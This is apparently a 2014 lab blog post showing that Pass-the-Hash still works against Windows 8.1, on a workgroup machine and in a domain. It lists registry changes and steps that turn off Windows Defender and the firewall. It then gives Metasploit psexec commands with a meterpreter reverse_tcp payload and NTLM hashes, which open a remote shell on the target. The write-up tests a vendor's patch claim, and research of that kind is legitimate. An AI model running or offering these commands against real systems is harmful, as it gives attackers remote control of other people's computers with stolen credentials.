Pass the Hash on Windows 8.1

Microsoft claims that the Pass the Hash exploit has finally been patched in Windows 8.1, as trumpeted in Oct, 2013:

The man who made the patch will be speaking next week at CCSF.

But when I posted this on Twitter, @obscuresec @passingthehash and @jameslyne engaged me in lively discussion, claiming PtH still works.

And, with their help, I got it working two ways.

1. Simple Demo on a Workgroup


I made a clean install of Windows 8.1 into a virtual machine, and made these adjustments, as recommended here:

1. In HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters, make sure "RequireSecuritySignature" is set to 0 (it was)

2. In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, add a new DWORD (32-bit) called "LocalAccountTokenFilterPolicy" and set it to 1

3. Disable real-time protection in Windows Defender.

From Kali Linux, perform a Pass-the-Hash attack with this command, adjusting the IP addresses to be correct:

msfcli msfcli /usr/share/metasploit-framework/lib/msf/core/exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=443 RHOST= SMBUser=Admin2 SMBPass=aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 E

It works, as shown below:

2. In a Domain

Here's what I did:

1. Make a Server 2012 domain controller as explained here:
2. Join Win 8.1 machine to domain

3. In "Network and Sharing Center", click "Change advanced sharing settings". In the Domain profile, turn on "network discovery" and "file and printer sharing".

4. Turn off Windows Firewall for Domain profile

5. In Kali:


cd .msf4/modules

mkdir exploits

cd exploits
mkdir windows

cd windows

mkdir powershell

cd powershell



use exploit/windows/powershell/powershell_psexec
set LHOST 
set ARCH x86
set SMBDomain
set SMBUser Administrator
set SMBPASS 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42
As you can see below, it worked!

Posted 6:36 pm 2-22-14 by Sam Bowne
Domain version added 8:35 pm 2-22-14